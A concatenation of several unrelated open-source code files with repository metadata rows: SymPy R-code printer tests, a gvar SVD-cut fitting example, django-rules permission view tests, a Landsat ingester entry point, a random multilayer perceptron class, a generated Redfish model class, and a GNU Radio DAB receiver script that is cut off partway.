assert rcode(Rational(18, 9)) == "2"
assert rcode(Rational(3, -7)) == "-3.0/7.0"
assert rcode(Rational(-3, -7)) == "3.0/7.0"
assert rcode(x + Rational(3, 7)) == "x + 3.0/7.0"
assert rcode(Rational(3, 7)*x) == "(3.0/7.0)*x"
def test_rcode_Integer():
assert rcode(Integer(67)) == "67"
assert rcode(Integer(-1)) == "-1"
def test_rcode_functions():
assert rcode(sin(x) ** cos(x)) == "sin(x)^cos(x)"
assert rcode(factorial(x) + gamma(y)) == "factorial(x) + gamma(y)"
assert rcode(beta(Min(x, y), Max(x, y))) == "beta(min(x, y), max(x, y))"
def test_rcode_inline_function():
x = symbols('x')
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(g(x)) == "2*x"
g = implemented_function('g', Lambda(x, 2*x/Catalan))
assert rcode(
g(x)) == "Catalan = %s;\n2*x/Catalan" % Catalan.n()
A = IndexedBase('A')
i = Idx('i', symbols('n', integer=True))
g = implemented_function('g', Lambda(x, x*(1 + x)*(2 + x)))
res=rcode(g(A[i]), assign_to=A[i])
ref=(
"for (i in 1:n){\n"
" A[i] = (A[i] + 1)*(A[i] + 2)*A[i];\n"
"}"
)
assert res == ref
def test_rcode_exceptions():
assert rcode(ceiling(x)) == "ceiling(x)"
assert rcode(Abs(x)) == "abs(x)"
assert rcode(gamma(x)) == "gamma(x)"
def test_rcode_user_functions():
x = symbols('x', integer=False)
n = symbols('n', integer=True)
custom_functions = {
"ceiling": "myceil",
"Abs": [(lambda x: not x.is_integer, "fabs"), (lambda x: x.is_integer, "abs")],
}
assert rcode(ceiling(x), user_functions=custom_functions) == "myceil(x)"
assert rcode(Abs(x), user_functions=custom_functions) == "fabs(x)"
assert rcode(Abs(n), user_functions=custom_functions) == "abs(n)"
def test_rcode_boolean():
assert rcode(True) == "True"
assert rcode(S.true) == "True"
assert rcode(False) == "False"
assert rcode(S.false) == "False"
assert rcode(x & y) == "x & y"
assert rcode(x | y) == "x | y"
assert rcode(~x) == "!x"
assert rcode(x & y & z) == "x & y & z"
assert rcode(x | y | z) == "x | y | z"
assert rcode((x & y) | z) == "z | x & y"
assert rcode((x | y) & z) == "z & (x | y)"
def test_rcode_Relational():
from sympy import Eq, Ne, Le, Lt, Gt, Ge
assert rcode(Eq(x, y)) == "x == y"
assert rcode(Ne(x, y)) == "x != y"
assert rcode(Le(x, y)) == "x <= y"
assert rcode(Lt(x, y)) == "x < y"
assert rcode(Gt(x, y)) == "x > y"
assert rcode(Ge(x, y)) == "x >= y"
def test_rcode_Piecewise():
expr = Piecewise((x, x < 1), (x**2, True))
res=rcode(expr)
ref="ifelse(x < 1,x,x^2)"
assert res == ref
tau=Symbol("tau")
res=rcode(expr,tau)
ref="tau = ifelse(x < 1,x,x^2);"
assert res == ref
expr = 2*Piecewise((x, x < 1), (x**2, x<2), (x**3,True))
assert rcode(expr) == "2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3))"
res = rcode(expr, assign_to='c')
assert res == "c = 2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3));"
# Check that Piecewise without a True (default) condition error
#expr = Piecewise((x, x < 1), (x**2, x > 1), (sin(x), x > 0))
#raises(ValueError, lambda: rcode(expr))
expr = 2*Piecewise((x, x < 1), (x**2, x<2))
assert(rcode(expr))== "2*ifelse(x < 1,x,ifelse(x < 2,x^2,NA))"
def test_rcode_sinc():
from sympy import sinc
expr = sinc(x)
res = rcode(expr)
ref = "ifelse(x != 0,sin(x)/x,1)"
assert res == ref
def test_rcode_Piecewise_deep():
p = rcode(2*Piecewise((x, x < 1), (x + 1, x < 2), (x**2, True)))
assert p == "2*ifelse(x < 1,x,ifelse(x < 2,x + 1,x^2))"
expr = x*y*z + x**2 + y**2 + Piecewise((0, x < 0.5), (1, True)) + cos(z) - 1
p = rcode(expr)
ref="x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1"
assert p == ref
ref="c = x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1;"
p = rcode(expr, assign_to='c')
assert p == ref
def test_rcode_ITE():
expr = ITE(x < 1, y, z)
p = rcode(expr)
ref="ifelse(x < 1,y,z)"
assert p == ref
def test_rcode_settings():
raises(TypeError, lambda: rcode(sin(x), method="garbage"))
def test_rcode_Indexed():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o = symbols('n m o', integer=True)
i, j, k = Idx('i', n), Idx('j', m), Idx('k', o)
p = RCodePrinter()
p._not_r = set()
x = IndexedBase('x')[j]
assert p._print_Indexed(x) == 'x[j]'
A = IndexedBase('A')[i, j]
assert p._print_Indexed(A) == 'A[i, j]'
B = IndexedBase('B')[i, j, k]
assert p._print_Indexed(B) == 'B[i, j, k]'
assert p._not_r == set()
def test_rcode_Indexed_without_looking_for_contraction():
len_y = 5
y = IndexedBase('y', shape=(len_y,))
x = IndexedBase('x', shape=(len_y,))
Dy = IndexedBase('Dy', shape=(len_y-1,))
i = Idx('i', len_y-1)
e=Eq(Dy[i], (y[i+1]-y[i])/(x[i+1]-x[i]))
code0 = rcode(e.rhs, assign_to=e.lhs, contract=False)
assert code0 == 'Dy[i] = (y[%s] - y[i])/(x[%s] - x[i]);' % (i + 1, i + 1)
def test_rcode_loops_matrix_vector():
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j], assign_to=y[i])
assert c == s
def test_dummy_loops():
# the following line could also be
# [Dummy(s, integer=True) for s in 'im']
# or [Dummy(integer=True) for s in 'im']
i, m = symbols('i m', integer=True, cls=Dummy)
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx(i, m)
expected = (
'for (i_%(icount)i in 1:m_%(mcount)i){\n'
' y[i_%(icount)i] = x[i_%(icount)i];\n'
'}'
) % {'icount': i.label.dummy_index, 'mcount': m.dummy_index}
code = rcode(x[i], assign_to=y[i])
assert code == expected
def test_rcode_loops_add():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
z = IndexedBase('z')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = x[i] + z[i];\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j] + x[i] + z[i], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_contractions():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = a[i, j, k, l]*b[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode(b[j, k, l]*a[i, j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_addfactor():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = (a[i, j, k, l] + b[i, j, k, l])*c[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode((a[i, j, k, l] + b[i, j, k, l])*c[j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_terms():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
s0 = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
)
s1 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' y[i] = b[j]*b[k]*c[i, j, k] + y[i];\n'
' }\n'
' }\n'
'}\n'
)
s2 = (
'for (i in 1:m){\n'
' for (k in 1:o){\n'
' y[i] = a[i, k]*b[k] + y[i];\n'
' }\n'
'}\n'
)
s3 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = a[i, j]*b[j] + y[i];\n'
' }\n'
'}\n'
)
c = rcode(
b[j]*a[i, j] + b[k]*a[i, k] + b[j]*b[k]*c[i, j, k], assign_to=y[i])
ref=dict()
ref[0] = s0 + s1 + s2 + s3[:-1]
ref[1] = s0 + s1 + s3 + s2[:-1]
ref[2] = s0 + s2 + s1 + s3[:-1]
ref[3] = s0 + s2 + s3 + s1[:-1]
ref[4] = s0 + s3 + s1 + s2[:-1]
ref[5] = s0 + s3 + s2 + s1[:-1]
assert (c == ref[0] or
c == ref[1] or
c == ref[2] or
c == ref[3] or
c == ref[4] or
c == ref[5])
def test_dereference_printing():
expr = x + y + sin(z) + z
assert rcode(expr, dereference=[z]) == "x + y + (*z) + sin((*z))"
def test_Matrix_printing():
# Test returning a Matrix
mat = Matrix([x*y, Piecewise((2 + x, y>0), (y, True)), sin(z)])
A = MatrixSymbol('A', 3, 1)
p = rcode(mat, A)
assert p == (
"A[0] = x*y;\n"
"A[1] = ifelse(y > 0,x + 2,y);\n"
"A[2] = sin(z);")
# Test using MatrixElements in expressions
expr = Piecewise((2*A[2, 0], x > 0), (A[2, 0], True)) + sin(A[1, 0]) + A[0, 0]
p = rcode(expr)
assert p == ("ifelse(x > 0,2*A[2],A[2]) + sin(A[1]) + A[0]")
# Test using MatrixElements in a Matrix
q = MatrixSymbol('q', 5, 1)
M = MatrixSymbol('M', 3, 3)
m = Matrix([[sin(q[1,0]), 0, cos(q[2,0])],
[q[1,0] + q[2,0], q[3, 0], 5],
[2*q[4, 0]/q[1,0], sqrt(q[0,0]) + 4, 0]])
assert rcode(m, M) == (
"M[0] = sin(q[1]);\n"
"M[1] = 0;\n"
"M[2] = cos(q[2]);\n"
"M[3] = q[1] + q[2];\n"
"M[4] = q[3];\n"
"M[5] = 5;\n"
"M[6] = 2*q[4]/q[1];\n"
"M[7] = sqrt(q[0]) + 4;\n"
"M[8] = 0;")
def test_rcode_sgn():
expr = sign(x) * y
assert rcode(expr) == 'y*sign(x)'
p = rcode(expr, 'z')
assert p == 'z = y*sign(x);'
p = rcode(sign(2 * x + x**2) * x + x**2)
assert p == "x^2 + x*sign(x^2 + 2*x)"
expr = sign(cos(x))
p = rcode(expr)
assert p == 'sign(cos(x))'
def test_rcode_Assignment():
assert rcode(Assignment(x, y + z)) == 'x = y + z;'
assert rcode(aug_assign(x, '+', y + z)) == 'x += y + z;'
def test_rcode_For():
f = For(x, Range(0, 10, 2), [aug_assign(y, '*', x)])
sol = rcode(f)
assert sol == ("for (x = 0; x < 10; x += 2) {\n"
" y *= x;\n"
"}")
def test_MatrixElement_printing():
# test cases for issue #11821
A = MatrixSymbol("A", 1, 3)
B = MatrixSymbol("B", 1, 3)
C = MatrixSymbol("C", 1, 3)
assert(rcode(A[0, 0]) == "A[0]")
assert(rcode(3 * A[0, 0]) == "3*A[0]")
F = C[0, 0].subs(C, A - B)
assert(rcode(F) == "(A - B)[0]")
| bsd-3-clause | -5,326,308,247,995,265,000 | 27.87169 | 105 | 0.482294 | false |
gplepage/gvar | examples/svdcut.py | 1 | 2303 | """
svdcut.py --- Correlations and SVD Cuts
This code illustrates the use of SVD cuts when calculating
correlations using random samples. See the Case Study in the
documentation for more information.
"""
from __future__ import print_function
import numpy as np
import gvar as gv
try:
# may not be installed, in which case bail.
import lsqfit
except:
# fake the run so "make run" still works
outfile = open('svdcut.out', 'r').read()
print(outfile[:-1])
exit()
SHOW_PLOTS = False
def main():
gv.ranseed(4)
x = np.array([1., 2., 3., 4., 5., 6., 7., 8., 9., 10.])
y_samples = [
[2.8409, 4.8393, 6.8403, 8.8377, 10.8356, 12.8389, 14.8356, 16.8362, 18.8351, 20.8341],
[2.8639, 4.8612, 6.8597, 8.8559, 10.8537, 12.8525, 14.8498, 16.8487, 18.8460, 20.8447],
[3.1048, 5.1072, 7.1071, 9.1076, 11.1090, 13.1107, 15.1113, 17.1134, 19.1145, 21.1163],
[3.0710, 5.0696, 7.0708, 9.0705, 11.0694, 13.0681, 15.0693, 17.0695, 19.0667, 21.0678],
[3.0241, 5.0223, 7.0198, 9.0204, 11.0191, 13.0193, 15.0198, 17.0163, 19.0154, 21.0155],
[2.9719, 4.9700, 6.9709, 8.9706, 10.9707, 12.9705, 14.9699, 16.9686, 18.9676, 20.9686],
[3.0688, 5.0709, 7.0724, 9.0730, 11.0749, 13.0776, 15.0790, 17.0800, 19.0794, 21.0795],
[3.1471, 5.1468, 7.1452, 9.1451, 11.1429, 13.1445, 15.1450, 17.1435, 19.1425, 21.1432],
[3.0233, 5.0233, 7.0225, 9.0224, 11.0225, 13.0216, 15.0224, 17.0217, 19.0208, 21.0222],
[2.8797, 4.8792, 6.8803, 8.8794, 10.8800, 12.8797, 14.8801, 16.8797, 18.8803, 20.8812],
[3.0388, 5.0407, 7.0409, 9.0439, 11.0443, 13.0459, 15.0455, 17.0479, 19.0493, 21.0505],
[3.1353, 5.1368, 7.1376, 9.1367, 11.1360, 13.1377, 15.1369, 17.1400, 19.1384, 21.1396],
[3.0051, 5.0063, 7.0022, 9.0052, 11.0040, 13.0033, 15.0007, 16.9989, 18.9994, 20.9995],
]
y = gv.dataset.avg_data(y_samples)
svd = gv.dataset.svd_diagnosis(y_samples)
y = gv.svd(y, svdcut=svd.svdcut)
if SHOW_PLOTS:
svd.plot_ratio(show=True)
def fcn(p):
return p['y0'] + p['s'] * x
prior = gv.gvar(dict(y0='0(5)', s='0(5)'))
fit = lsqfit.nonlinear_fit(data=y, fcn=fcn, prior=prior)
print(fit)
if __name__ == '__main__':
main()
| gpl-3.0 | 5,101,233,874,259,818,000 | 40.125 | 98 | 0.583152 | false |
smcoll/django-rules | tests/testsuite/contrib/test_views.py | 1 | 6234 | from __future__ import absolute_import
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from django.http import HttpRequest, Http404
from django.test import TestCase
from django.utils.encoding import force_str
from rules.contrib.views import objectgetter
from testapp.models import Book
class FBVDecoratorTests(TestCase):
def test_objectgetter(self):
request = HttpRequest()
book = Book.objects.get(pk=1)
self.assertEqual(book, objectgetter(Book)(request, pk=1))
self.assertEqual(book, objectgetter(Book, attr_name='id')(request, id=1))
self.assertEqual(book, objectgetter(Book, field_name='id')(request, pk=1))
with self.assertRaises(ImproperlyConfigured):
# Raise if no `pk` argument is provided to the view
self.assertEqual(book, objectgetter(Book)(request, foo=1))
with self.assertRaises(ImproperlyConfigured):
# Raise if given invalid model lookup field
self.assertEqual(book, objectgetter(Book, field_name='foo')(request, pk=1))
with self.assertRaises(Http404):
# Raise 404 if no model instance found
self.assertEqual(book, objectgetter(Book)(request, pk=100000))
def test_permission_required(self):
# Adrian can change his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can change Adrian's book
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Adrian can delete his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('delete_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can *not* delete Adrian's book and is redirected to login
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('delete_book', args=(1,)))
self.assertEqual(response.status_code, 302)
# Martin can *not* delete Adrian's book and an PermissionDenied is raised
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('view_that_raises', args=(1,)))
self.assertEqual(response.status_code, 403)
# Test views that require a list of permissions
# Adrian has both permissions
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin does not have delete permission
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 302)
# Test views that accept a static object as argument
# fn is passed to has_perm as-is
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('view_with_object', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('view_with_object', args=(1,)))
self.assertEqual(response.status_code, 302)
class CBVMixinTests(TestCase):
def test_permission_required_mixin(self):
# Adrian can change his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('cbv.change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can change Adrian's book
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Adrian can delete his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('cbv.delete_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can *not* delete Adrian's book and is redirected to login
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.delete_book', args=(1,)))
self.assertEqual(response.status_code, 302)
# Martin can *not* delete Adrian's book and an PermissionDenied is raised
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.view_that_raises', args=(1,)))
self.assertEqual(response.status_code, 403)
# Test views that require a list of permissions
# Adrian has both permissions
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('cbv.view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin does not have delete permission
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 302)
| mit | 642,590,048,350,649,100 | 46.587786 | 87 | 0.677254 | false |
alex-ip/agdc | agdc/landsat_ingester/__main__.py | 1 | 2058 | #!/usr/bin/env python
# ===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===============================================================================
"""
landsat_ingester.py - Ingester script for landsat datasets.
"""
from __future__ import absolute_import
from agdc.landsat_ingester import LandsatIngester
from agdc.abstract_ingester import run_ingest
if __name__ == "__main__":
run_ingest(LandsatIngester)
| bsd-3-clause | 2,366,633,804,520,542,700 | 49.45 | 86 | 0.68999 | false |
GAMPTeam/vampyre | demos/mlp/randmlp.py | 1 | 3387 | # -*- coding: utf-8 -*-
"""
randmlp: Random MLP class definitions
@author: Sundeep
"""
import numpy as np
import pickle
"""
Randomly generated multilayer perceptron
"""
class RandomMLP:
"""
Constructor
"""
def __init__(self, nin, nhid, nout, sparse_tgt=[]):
# Get dimensions
self.nin = nin
self.nhid = nhid
self.nout = nout
self.nlayers = len(nhid)
# Sparsity target to adjust bias levels in each layer
if sparse_tgt is None:
self.sparse_tgt = 0.4*np.ones(self.nlayers)
else:
self.sparse_tgt = sparse_tgt
# Number of samples used in calibrating the parameters
self.ns = 100
# Pickle file name
self.save_file = 'mlp.p'
"""
Saves the weights to a pickle file
"""
def save_weigths(self):
pickle.dump((self.Ws,self.bs), open(self.save_file, "wb") )
"""
Restore weights
"""
def restore_weigths(self):
self.Ws, self.bs = pickle.load(open(self.save_file, "rb") )
"""
Generate random weights based on sparsity in each layer
"""
def gen_weigths(self):
# Create list to store weights and biases
self.Ws = []
self.bs = []
self.z0s = []
self.z1s = []
# Generate random input
x = np.random.randn(self.nin,self.ns)
z0 = x
for i in range(self.nlayers+1):
self.z0s.append(z0)
# Get dimensions for the layer
n0 = z0.shape[0]
if i==self.nlayers:
n1 = self.nout
stgt = 1
else:
n1 = self.nhid[i]
stgt = self.sparse_tgt[i]
# Generate linear outputs w/o bias
z0norm = np.mean(np.abs(z0)**2)
W = np.random.randn(n1,n0)/np.sqrt(n0*z0norm)
z1 = W.dot(z0)
# Sort to find the biases that adjust the correct sparsity
# level
if stgt < 1:
zsort = np.sort(z1,axis=1)
itgt = int((1-stgt)*self.ns)
b = -zsort[:,itgt]
else:
b = np.random.randn(n1)
z1 = z1 + b[:,None]
# Apply the ReLU for the next layer
z0 = np.maximum(0, z1)
# Save the weights and biases
self.Ws.append(W)
self.bs.append(b)
self.z1s.append(z1)
"""
Generate the outputs given input x
"""
def run(self, z0=[], ns=10):
# Generate initial random initial states if they are unspecified
if z0 == []:
z0 = np.random.randn(self.nin,ns)
# Lists to store intermediate variables
zs = []
# Loop over layers
for i in range(self.nlayers+1):
# Save input
zs.append(z0)
# Linear weights
W = self.Ws[i]
b = self.bs[i]
z1 = W.dot(z0)+b[:,None]
# Save ouptut
zs.append(z1)
# ReLU for the next layer
z0 = np.maximum(0, z1)
return zs
| mit | -1,413,568,176,545,062,700 | 25.460938 | 72 | 0.459404 | false |
jlongever/redfish-client-python | on_http_redfish_1_0/models/odata_4_0_0_context.py | 1 | 2489 | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class Odata400Context(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Odata400Context - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
}
self.attribute_map = {
}
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| apache-2.0 | -451,191,449,684,300,100 | 26.351648 | 77 | 0.55685 | false |
kit-cel/gr-dab | apps/dab_rx_constellation.py | 1 | 6407 | #!/usr/bin/env python2
# -*- coding: utf8 -*-
# Andreas Müller, 2008
# [email protected]
#
# this code may be freely used under GNU GPL conditions
"""
demodulate DAB signal and ouput to constellation sink
"""
from gnuradio import gr, uhd, blocks
from gnuradio import eng_notation
from gnuradio.eng_option import eng_option
from gnuradio.wxgui import stdgui2, fftsink2, scopesink2
import dab
from optparse import OptionParser
import wx
import sys, threading, time
class usrp_dab_gui_rx(stdgui2.std_top_block):
def __init__(self, frame, panel, vbox, argv):
stdgui2.std_top_block.__init__(self, frame, panel, vbox, argv)
self.frame = frame
self.panel = panel
parser = OptionParser(option_class=eng_option, usage="%prog: [options] <filename>")
parser.add_option("-m", "--dab-mode", type="int", default=1,
help="DAB mode [default=%default]")
parser.add_option("-F", "--filter-input", action="store_true", default=False,
help="Enable FFT filter at input")
parser.add_option('-c', '--correct-ffe', action="store_true", default=False,
help="do fine frequency correction")
parser.add_option('-u', '--correct-ffe-usrp', action="store_true", default=False,
help="do fine frequency correction by retuning the USRP instead of in software")
parser.add_option('-e', '--equalize-magnitude', action="store_true", default=False,
help="do magnitude equalization")
parser.add_option("-s", "--resample-fixed", type="eng_float", default=1,
help="resample by a fixed factor (fractional interpolation)")
parser.add_option("-S", "--autocorrect-sample-rate", action="store_true", default=False,
help="Estimate sample rate offset and resample (dynamic fractional interpolation)")
parser.add_option("-R", "--rx-subdev-spec", type="subdev", default=(0, 0),
help="select USRP Rx side A or B [default=A]")
parser.add_option("-f", "--freq", type="eng_float", default=227.36e6,
help="set frequency to FREQ [default=%default]")
parser.add_option("-r", "--sample-rate", type="int", default=2000000,
help="set sample rate to SAMPLE_RATE [default=%default]")
parser.add_option("-d", "--decim", type="intx", default=32,
help="set decimation rate to DECIM [default=%default]")
parser.add_option("-g", "--rx-gain", type="eng_float", default=None,
help="set receive gain in dB (default is midpoint)")
parser.add_option('-v', '--verbose', action="store_true", default=False,
help="verbose output")
parser.add_option('-a', '--antenna', type="string", default="TX/RX",
help="select antenna")
(options, args) = parser.parse_args()
self.verbose = options.verbose
if len(args) == 0:
if self.verbose:
print "--> receiving from USRP"
self.src = uhd.usrp_source("",uhd.io_type.COMPLEX_FLOAT32,1)
#self.src.set_mux(usrp.determine_rx_mux_value(self.src, options.rx_subdev_spec))
#self.subdev = usrp.selected_subdev(self.src, options.rx_subdev_spec)
#if self.verbose:
# print "--> using RX dboard " + self.subdev.side_and_name()
# tune frequency
self.frequency = options.freq
self.set_freq(options.freq)
# set gain
if options.rx_gain is None:
# if no gain was specified, use the mid-point in dB
g = self.src.get_gain_range()
options.rx_gain = float(g.start()+g.stop())/2
self.src.set_gain(options.rx_gain)
self.sample_rate = 2e6#self.src.adc_rate()/options.decim
self.src.set_samp_rate(self.sample_rate)
self.src.set_antenna(options.antenna)
else:
if self.verbose:
print "--> receiving from file: " + args[0]
self.filename = args[0]
self.src = blocks.file_source(gr.sizeof_gr_complex, self.filename, False)
self.sample_rate = options.sample_rate
self.dab_params = dab.parameters.dab_parameters(mode=options.dab_mode, sample_rate=self.sample_rate, verbose=options.verbose)
self.rx_params = dab.parameters.receiver_parameters(mode=options.dab_mode, softbits=True, input_fft_filter=options.filter_input, autocorrect_sample_rate=options.autocorrect_sample_rate, sample_rate_correction_factor=options.resample_fixed, verbose=options.verbose, correct_ffe=options.correct_ffe, equalize_magnitude=options.equalize_magnitude)
self.demod = dab.ofdm_demod(self.dab_params, self.rx_params, verbose=self.verbose)
self.v2s = blocks.vector_to_stream(gr.sizeof_gr_complex, self.dab_params.num_carriers)
self.scope = scopesink2.scope_sink_c(self.panel, title="DAB constellation sink", sample_rate=self.dab_params.sample_rate, xy_mode=True)
self.trigsink = blocks.null_sink(gr.sizeof_char)
self.sink = blocks.null_sink(gr.sizeof_float*self.dab_params.num_carriers*2)
self.connect(self.src, self.demod, self.sink)
self.connect((self.demod,1), self.trigsink)
# build GUI
self.connect(self.demod.deinterleave, self.v2s, self.scope)
vbox.Add(self.scope.win, 10, wx.EXPAND)
self.wxgui_fftsink2_0 = fftsink2.fft_sink_c(
self.panel,
baseband_freq=0,
y_per_div=10,
y_divs=10,
ref_level=0,
ref_scale=2.0,
sample_rate=self.sample_rate,
fft_size=1024,
fft_rate=15,
average=False,
avg_alpha=None,
title="FFT Plot",
peak_hold=False,
)
vbox.Add(self.wxgui_fftsink2_0.win)
self.connect((self.src, 0), (self.wxgui_fftsink2_0, 0))
# retune USRP to correct FFE?
self.correct_ffe_usrp = options.correct_ffe_usrp
if self.correct_ffe_usrp:
print "--> correcting FFE on USRP"
